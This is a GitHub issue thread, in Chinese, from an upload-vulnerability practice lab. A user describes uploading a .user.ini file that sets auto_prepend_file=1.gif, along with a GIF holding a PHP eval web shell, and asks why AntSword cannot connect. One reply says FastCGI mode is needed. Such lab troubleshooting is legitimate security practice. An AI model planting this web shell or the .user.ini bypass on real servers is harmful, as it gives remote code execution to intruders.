We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
pass5中上传了一个.user.ini,内容如下: auto_prepend_file=1.gif 接着上传了一个1.gif,内容如下: <?php @eval($_POST[pass5]);?> 然后使用pass5连接如下URL: http://192.168.65.62/upload/readme.php 但是连接不成功哎,使用蚁剑,说是返回数据为空,使用maxhackbar连接时(pass5=phpinfo();)也没有反应,请问各位大佬有啥意见吗?在kali上使用docker搭建的靶场。
auto_prepend_file=1.gif
<?php @eval($_POST[pass5]);?>
http://192.168.65.62/upload/readme.php
The text was updated successfully, but these errors were encountered:
我也遇到了这个问题,你php是哪个版本的啊?
Sorry, something went wrong.
要改为FastCGI模式,默认的不行 https://blog.csdn.net/u014029795/article/details/117252533
No branches or pull requests
pass5中上传了一个.user.ini,内容如下:
auto_prepend_file=1.gif
接着上传了一个1.gif,内容如下:
<?php @eval($_POST[pass5]);?>
然后使用pass5连接如下URL:
http://192.168.65.62/upload/readme.php
但是连接不成功哎,使用蚁剑,说是返回数据为空,使用maxhackbar连接时(pass5=phpinfo();)也没有反应,请问各位大佬有啥意见吗?在kali上使用docker搭建的靶场。
The text was updated successfully, but these errors were encountered: